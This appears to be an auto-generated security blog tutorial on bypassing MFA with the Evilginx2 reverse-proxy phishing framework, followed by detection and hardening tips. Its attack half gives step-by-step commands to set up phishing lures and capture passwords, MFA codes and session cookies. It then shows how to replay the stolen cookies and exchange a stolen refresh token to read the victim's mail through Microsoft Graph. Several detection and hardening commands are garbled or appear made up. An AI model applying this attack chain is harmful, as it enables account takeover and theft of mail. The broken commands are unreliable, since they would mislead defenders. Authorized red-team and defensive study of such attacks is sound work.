Listen to this Post
Introduction:
Multi-factor authentication (MFA) has become the gold standard for securing access, but adversaries have evolved beyond simple credential phishing. Modern adversary-in-the-middle (AitM) frameworks like Evilginx2 allow attackers to transparently proxy authentication flows, capture plaintext credentials, session cookies, and even bypass hardware tokens in real time. Understanding this attack chain is critical for blue teams to implement effective detections and for red teams to validate defenses.
Learning Objectives:
- Understand how reverse-proxy frameworks bypass MFA and hijack authenticated sessions.
- Set up and configure Evilginx2 for authorized penetration testing and capture OAuth tokens.
- Detect and mitigate AitM attacks using network telemetry, browser policies, and conditional access controls.
You Should Know:
- Deploying an AitM Phishing Proxy – Evilginx2 Step-by-Step
This guide assumes you have a VPS (Ubuntu 22.04) and a registered domain. Evilginx2 creates a reverse proxy that sits between the victim and the legitimate login page, intercepting both credentials and post-MFA session cookies.
Step 1: Install dependencies and Evilginx2
sudo apt update && sudo apt install -y build-essential git golang-go git clone https://github.com/kgretzky/evilginx2.git cd evilginx2 make sudo make install
Step 2: Configure the phishlet (template for target service)
Evilginx2 uses “phishlets” – YAML configurations for specific platforms (Microsoft, Google, GitHub, etc.). List available phishlets:
evilginx -p /path/to/phishlets
Select a phishlet, e.g., `office365`:
phishlet get office365 phishlet enable office365
Step 3: Set up domain and lure URL
config domain yourdomain.com config ip <your_vps_public_ip> lures create office365 lures edit <lure_id> redirect_url https://real-login.microsoftonline.com lures get-url <lure_id>
Victims clicking the lure URL see a perfect clone of the login page. When they enter credentials + MFA code, Evilginx2 logs:
– Plaintext password
– MFA code (if app-based)
– Complete session cookie (e.g., ESTSAUTH, ASP.NET_SessionId)
Step 4: Replay the hijacked session
After the victim authenticates, their session cookie is saved. Import it into a browser (EditThisCookie extension) and navigate to the target site – you are now authenticated as the victim, bypassing MFA entirely.
Windows detection command – look for anomalous proxied authentication requests:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match "10.0.0.1"} | Format-List
- Harvesting Cloud Tokens with Evilginx2 – OAuth & API Abuse
Modern SaaS applications issue OAuth refresh tokens that can be used to generate access tokens for APIs (Graph API, Gmail API, etc.). Evilginx2 captures these tokens, enabling lateral movement and data exfiltration.
Step-by-step guide to capture and use OAuth tokens:
- Enable a phishlet that supports OAuth (e.g.,
linkedin,azure). - After victim authenticates, locate the captured token in the sessions log:
sessions sessions <session_id>
- Extract the `refresh_token` and use it with a tool like
token-exchange.py:token_exchange.py import requests data = { 'client_id': 'your_app_id', 'refresh_token': 'captured_refresh_token', 'grant_type': 'refresh_token', 'client_secret': 'your_secret' } r = requests.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=data) print(r.json()['access_token']) - Use the access token to query APIs. Example – Microsoft Graph:
curl -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/me/messages
Linux detection – monitor for unusual token requests:
sudo tcpdump -i eth0 -n 'tcp port 443 and (host login.microsoftonline.com or graph.microsoft.com)' -A | grep -i "bearer"
- Hardening Against AitM Phishing – Conditional Access & Device Compliance
Mitigating these attacks requires more than user education. Microsoft’s “Continuous Access Evaluation” (CAE) and device-bound session cookies can break AitM attacks.
Step 1: Enforce compliant devices with Intune
Create a Conditional Access policy requiring “Hybrid Azure AD joined” or “Compliant device” – AitM proxies cannot emulate device posture.
Step 2: Enable token protection (Windows 11/Server 2022)
Set-AzureADPolicy -Definition @('{"TokenProtectionPolicy":{"EnableTokenProtection":true}}') -DisplayName "Token Protection" -Type "TokenProtectionPolicy"
Step 3: Use Web Application Proxy (WAP) with pre-authentication
For on-prem apps, force all authentication through WAP with AD FS MFA – this breaks reverse-proxy flows.
Linux hardening – deploy a custom browser extension that checks for rogue certificates (common in SSL stripping):
Monitor for self-signed certs in traffic ngrep -d eth0 -W byline "subject: CN=" port 443
- Simulating an AitM Attack on Your Own Lab – Full Red Team Exercise
Build a safe lab: Ubuntu VPS (attacker) + Windows 11 victim + Microsoft 365 E5 trial.
Step 1: Configure Evilginx2 with a custom phishlet for a demo app (or use the built-in `linkedin` phishlet).
Step 2: Send lure via email (simulate spearphishing) – use Gophish (open-source phishing framework):
Install Gophish wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip unzip gophish-.zip && cd gophish- sudo ./gophish
Step 3: Capture credentials – after victim clicks, Evilginx2 logs show:
[22:30:12] [bash] office365: captured credentials: [email protected]:Password123 [22:30:15] [bash] office365: captured MFA code: 123456 [22:30:17] [bash] office365: captured session cookie: ESTSAUTH=AQAB...
Step 4: Session replay – paste cookie into Chrome’s devtools (Application > Cookies) and refresh – MFA bypassed.
Windows detection (Sysmon) – look for unusual process ancestry (browser spawned by Office macro):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object {$<em>.Properties[bash].Value -match "WINWORD.EXE" -and $</em>.Properties[bash].Value -match "chrome.exe"}
5. Defensive Response – Hunting for AitM Indicators
Blue teams can hunt for Evilginx2’s fingerprints: missing `Sec-Fetch-` headers, unusual `User-Agent` patterns, and duplicate `Set-Cookie` responses.
Step 1: Deploy Zeek (formerly Bro) to detect proxyed logins
Custom Zeek script to flag AitM patterns
event http_header(c: connection, is_orig: bool, name: string, value: string)
{
if (name == "X-Forwarded-For" && is_orig == F)
print fmt("Potential proxy: %s", c$id$orig_h);
}
Step 2: Analyze authentication logs for geographic anomalies
Extract IP from Azure AD sign-in logs via PowerShell
Get-AzureADAuditSignInLogs -Top 100 | Where-Object {$_.Status.ErrorCode -eq 0} | Select-Object UserPrincipalName, IpAddress, ClientAppUsed
Step 3: Block known Evilginx2 user-agents (e.g., Evilginx2/0.2). Add to WAF or proxy:
Nginx configuration
if ($http_user_agent ~ "Evilginx2") {
return 403;
}
What Undercode Say:
- Key Takeaway 1: MFA alone is insufficient against real-time AitM phishing; session token binding to device hardware (e.g., Windows Hello for Business) is the next defensive frontier.
- Key Takeaway 2: Detection must shift from credential-based alerts to behavioral anomalies – impossible travel, missing security headers, and token replay attempts across disparate IPs.
The sophistication of tools like Evilginx2 lowers the barrier for novice attackers while evading legacy security controls. Organizations must adopt phishing-resistant MFA (WebAuthn, FIDO2) and enforce continuous access evaluation. Red teams should integrate AitM frameworks into their arsenals to test detection capabilities, while blue teams should prioritize monitoring for session replay and unusual OAuth token requests. As AI-driven phishing generation becomes mainstream, expect fully automated AitM campaigns that adapt lure content in real time.
Prediction:
By late 2026, AitM-as-a-service will commoditize session hijacking, leading to a surge in supply‑chain compromises via compromised SaaS accounts. In response, identity providers will introduce mandatory device attestation and real‑time risk scoring based on user behavior telemetry. Organizations that fail to adopt phishing‑resistant authenticators will experience breach rates similar to pre‑MFA eras, shifting the attack surface from password theft to session token exfiltration.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Infosec Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
